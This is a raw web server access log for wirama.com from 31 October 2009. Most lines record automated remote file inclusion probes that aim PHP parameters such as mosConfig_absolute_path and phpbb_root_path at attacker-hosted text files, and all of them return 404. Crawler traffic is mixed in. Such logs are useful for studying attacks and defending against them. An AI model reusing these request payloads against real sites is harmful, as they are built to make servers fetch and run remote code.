78.110.50.121 - - [31/Oct/2009:11:51:08 -0700] "GET /include/prodler.class.php?Path=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
78.110.50.121 - - [31/Oct/2009:11:51:08 -0700] "GET /logs//include/prodler.class.php?Path=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
78.110.50.121 - - [31/Oct/2009:11:51:08 -0700] "GET /logs/access_090731.log//include/prodler.class.php?Path=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
71.6.151.148 - - [31/Oct/2009:11:51:26 -0700] "GET /include/prodler.class.php?Path=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
71.6.151.148 - - [31/Oct/2009:11:51:26 -0700] "GET /logs//include/prodler.class.php?Path=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
71.6.151.148 - - [31/Oct/2009:11:51:26 -0700] "GET /logs/access_090731.log//include/prodler.class.php?Path=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [31/Oct/2009:11:54:40 -0700] "GET /logs/access_090731.log//include/prodler.class.php?Path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [31/Oct/2009:11:54:40 -0700] "GET /include/prodler.class.php?Path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [31/Oct/2009:11:54:40 -0700] "GET /logs//include/prodler.class.php?Path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
82.193.15.3 - - [31/Oct/2009:12:00:33 -0700] "GET /logs//include/prodler.class.php?Path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
82.193.15.3 - - [31/Oct/2009:12:00:46 -0700] "GET /include/prodler.class.php?Path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.244.236.249 - - [31/Oct/2009:12:04:57 -0700] "GET /logs/access_090401.log//kboard/kboard.php?board=freeboard&act=write&no=185&page=&cid=&mode=reply&act=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.244.236.249 - - [31/Oct/2009:12:04:57 -0700] "GET /logs//kboard/kboard.php?board=freeboard&act=write&no=185&page=&cid=&mode=reply&act=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.244.236.249 - - [31/Oct/2009:12:04:57 -0700] "GET /kboard/kboard.php?board=freeboard&act=write&no=185&page=&cid=&mode=reply&act=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.244.236.249 - - [31/Oct/2009:12:11:44 -0700] "GET /logs/access_090401.log/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.244.236.249 - - [31/Oct/2009:12:11:44 -0700] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.244.236.249 - - [31/Oct/2009:12:11:44 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.244.236.249 - - [31/Oct/2009:12:11:45 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.244.236.249 - - [31/Oct/2009:12:11:45 -0700] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.244.236.249 - - [31/Oct/2009:12:11:45 -0700] "GET /logs/access_090401.log/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.244.236.249 - - [31/Oct/2009:12:11:58 -0700] "GET /logs/access_090329.log/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.244.236.249 - - [31/Oct/2009:12:11:58 -0700] "GET /logs/access_090329.log/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
89.171.190.107 - - [31/Oct/2009:12:31:45 -0700] "GET /logs/access_090601.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
89.171.190.107 - - [31/Oct/2009:12:31:48 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
89.171.190.107 - - [31/Oct/2009:12:31:48 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
89.171.190.107 - - [31/Oct/2009:12:33:57 -0700] "GET /logs/access_090801.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.195.111.57 - - [31/Oct/2009:12:35:11 -0700] "GET /logs/access_090401.log HTTP/1.0" 200 74403 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
65.55.207.75 - - [31/Oct/2009:12:43:38 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.207.75 - - [31/Oct/2009:12:46:15 -0700] "GET / HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
67.195.111.57 - - [31/Oct/2009:12:48:15 -0700] "GET /logs/access_090531.log HTTP/1.0" 200 7874616 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
124.0.54.130 - - [31/Oct/2009:12:50:24 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.duna21.co.kr/bbs/icon/icon1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
124.0.54.130 - - [31/Oct/2009:12:50:24 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.duna21.co.kr/bbs/icon/icon1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
124.0.54.130 - - [31/Oct/2009:12:50:24 -0700] "GET /logs/access_090701.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.duna21.co.kr/bbs/icon/icon1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
124.0.54.130 - - [31/Oct/2009:12:50:43 -0700] "GET /logs/access_090601.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.duna21.co.kr/bbs/icon/icon1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.207.27 - - [31/Oct/2009:12:51:01 -0700] "GET /tmp/?D=A HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
83.167.62.167 - - [31/Oct/2009:13:08:50 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "www.wirama.com"
83.167.62.167 - - [31/Oct/2009:13:08:51 -0700] "GET /tmp/?M=A HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "www.wirama.com"
125.247.60.5 - - [31/Oct/2009:13:23:36 -0700] "GET /logs//myfunctions/mygallerybrowser.php?myPath=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
125.247.60.5 - - [31/Oct/2009:13:23:36 -0700] "GET /logs/access_090731.log//myfunctions/mygallerybrowser.php?myPath=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
125.247.60.5 - - [31/Oct/2009:13:23:36 -0700] "GET /myfunctions/mygallerybrowser.php?myPath=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
125.247.60.5 - - [31/Oct/2009:13:26:39 -0700] "GET /logs//myfunctions/mygallerybrowser.php?myPath=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
125.247.60.5 - - [31/Oct/2009:13:26:39 -0700] "GET /myfunctions/mygallerybrowser.php?myPath=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
67.195.111.57 - - [31/Oct/2009:13:39:24 -0700] "GET /logs/?D=D HTTP/1.0" 200 3267 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
83.167.62.167 - - [31/Oct/2009:13:56:34 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "wirama.com"
83.167.62.167 - - [31/Oct/2009:13:56:34 -0700] "GET /tmp/?D=A HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "wirama.com"
208.109.248.165 - - [31/Oct/2009:14:12:43 -0700] "GET /skin/zero_vote/error.php?dir=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "wirama.com"
208.109.248.165 - - [31/Oct/2009:14:12:43 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "wirama.com"
208.109.248.165 - - [31/Oct/2009:14:12:43 -0700] "GET /logs/access_090801.log/skin/zero_vote/error.php?dir=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "wirama.com"
206.225.23.4 - - [31/Oct/2009:14:17:56 -0700] "GET /logs/access_090701.log//index.php?p=http://www.telephone114.com//bbs/data/jancok/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
206.225.23.4 - - [31/Oct/2009:14:17:56 -0700] "GET /index.php?p=http://www.telephone114.com//bbs/data/jancok/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
206.225.23.4 - - [31/Oct/2009:14:17:57 -0700] "GET /logs//index.php?p=http://www.telephone114.com//bbs/data/jancok/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
206.225.23.4 - - [31/Oct/2009:14:18:08 -0700] "GET /logs/access_090701.log//index.php?p=http://www.telephone114.com//bbs/data/jancok/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
206.225.23.4 - - [31/Oct/2009:14:18:08 -0700] "GET /logs//index.php?p=http://www.telephone114.com//bbs/data/jancok/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
206.225.23.4 - - [31/Oct/2009:14:18:08 -0700] "GET /index.php?p=http://www.telephone114.com//bbs/data/jancok/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [31/Oct/2009:14:23:08 -0700] "GET /logs/access_090801.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [31/Oct/2009:14:23:08 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [31/Oct/2009:14:23:08 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
210.97.237.144 - - [31/Oct/2009:14:24:02 -0700] "GET /////mods/iai/includes/constants.php?phpbb_root_path=http://www.gabrielposada.com//enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
210.97.237.144 - - [31/Oct/2009:14:24:07 -0700] "GET /logs/access_090901.log//////mods/iai/includes/constants.php?phpbb_root_path=http://www.gabrielposada.com//enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
210.97.237.144 - - [31/Oct/2009:14:24:07 -0700] "GET /logs//////mods/iai/includes/constants.php?phpbb_root_path=http://www.gabrielposada.com//enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
210.97.237.144 - - [31/Oct/2009:14:25:17 -0700] "GET /////mods/iai/includes/constants.php?phpbb_root_path=http://www.gabrielposada.com//enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
210.97.237.144 - - [31/Oct/2009:14:25:17 -0700] "GET /logs/access_090901.log//////mods/iai/includes/constants.php?phpbb_root_path=http://www.gabrielposada.com//enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
210.97.237.144 - - [31/Oct/2009:14:25:17 -0700] "GET /logs//////mods/iai/includes/constants.php?phpbb_root_path=http://www.gabrielposada.com//enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [31/Oct/2009:14:26:36 -0700] "GET /logs/access_090701.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [31/Oct/2009:14:26:36 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [31/Oct/2009:14:26:36 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [31/Oct/2009:14:27:37 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [31/Oct/2009:14:27:37 -0700] "GET /logs/access_090901.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [31/Oct/2009:14:27:37 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [31/Oct/2009:14:27:42 -0700] "GET /logs/access_090801.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [31/Oct/2009:14:29:59 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [31/Oct/2009:14:29:59 -0700] "GET /logs/access_090701.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [31/Oct/2009:14:29:59 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [31/Oct/2009:14:30:05 -0700] "GET /logs/access_090731.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [31/Oct/2009:14:31:37 -0700] "GET /logs/access_090701.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [31/Oct/2009:14:31:37 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [31/Oct/2009:14:31:37 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [31/Oct/2009:14:31:51 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [31/Oct/2009:14:31:51 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [31/Oct/2009:14:31:51 -0700] "GET /logs/access_090731.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [31/Oct/2009:14:32:07 -0700] "GET /logs/access_090501.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [31/Oct/2009:14:33:04 -0700] "GET /logs/access_090901.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [31/Oct/2009:14:34:26 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [31/Oct/2009:14:34:26 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [31/Oct/2009:14:34:26 -0700] "GET /logs/access_090901.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [31/Oct/2009:14:34:32 -0700] "GET /logs/access_090801.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [31/Oct/2009:14:35:32 -0700] "GET /logs/access_090901.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [31/Oct/2009:14:35:32 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [31/Oct/2009:14:35:32 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.195.111.57 - - [31/Oct/2009:14:35:47 -0700] "GET /_private/?M=D HTTP/1.0" 200 659 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
92.50.143.90 - - [31/Oct/2009:14:35:59 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [31/Oct/2009:14:35:59 -0700] "GET /logs/access_090731.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [31/Oct/2009:14:35:59 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [31/Oct/2009:14:38:22 -0700] "GET /logs/access_090701.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.208.46 - - [31/Oct/2009:14:40:56 -0700] "GET /logs/scripts.log HTTP/1.0" 200 5761 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
64.102.254.33 - - [31/Oct/2009:14:59:23 -0700] "GET / HTTP/1.1" 200 916 "http://www.google.com/search?q=wirama&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.15) Gecko/2009101601 Firefox/3.0.15 (.NET CLR 3.5.30729)" "www.wirama.com"
66.98.252.9 - - [31/Oct/2009:15:07:24 -0700] "GET /skin/zero_vote/error.php?dir=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "wirama.com"
66.98.252.9 - - [31/Oct/2009:15:07:25 -0700] "GET /logs/access_090801.log/skin/zero_vote/error.php?dir=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "wirama.com"
66.98.252.9 - - [31/Oct/2009:15:07:25 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "wirama.com"
64.102.254.33 - - [31/Oct/2009:15:07:36 -0700] "GET / HTTP/1.1" 200 916 "http://www.google.com/search?hl=en&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&hs=s8g&q=wirama+&aq=f&oq=&aqi=g3" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.15) Gecko/2009101601 Firefox/3.0.15 (.NET CLR 3.5.30729)" "www.wirama.com"
64.102.254.33 - - [31/Oct/2009:15:07:38 -0700] "GET / HTTP/1.1" 200 916 "http://www.google.com/search?hl=en&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&hs=s8g&q=wirama+&aq=f&oq=&aqi=g3" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.15) Gecko/2009101601 Firefox/3.0.15 (.NET CLR 3.5.30729)" "www.wirama.com"
64.102.254.33 - - [31/Oct/2009:15:07:43 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.15) Gecko/2009101601 Firefox/3.0.15 (.NET CLR 3.5.30729)" "www.wirama.com"
65.55.106.232 - - [31/Oct/2009:15:09:21 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
207.58.164.77 - - [31/Oct/2009:15:17:35 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://204.3.167.134/xxx?????????????????????????????????????????????????????????????????????????????????????????????????&mode=id HTTP/1.1" 404 275 "-" "-" "wirama.com"
207.58.164.77 - - [31/Oct/2009:15:17:38 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://204.3.167.134/xxx?????????????????????????????????????????????????????????????????????????????????????????????????&mode=id HTTP/1.1" 404 275 "-" "-" "wirama.com"
65.55.207.30 - - [31/Oct/2009:15:25:50 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.wirama.com"
114.108.177.238 - - [31/Oct/2009:15:26:06 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.freejeju.com/bbs/icon/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "wirama.com"
114.108.177.238 - - [31/Oct/2009:15:26:07 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.freejeju.com/bbs/icon/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "wirama.com"
65.55.207.30 - - [31/Oct/2009:15:28:02 -0700] "GET /files/series_A.pdf HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.wirama.com"
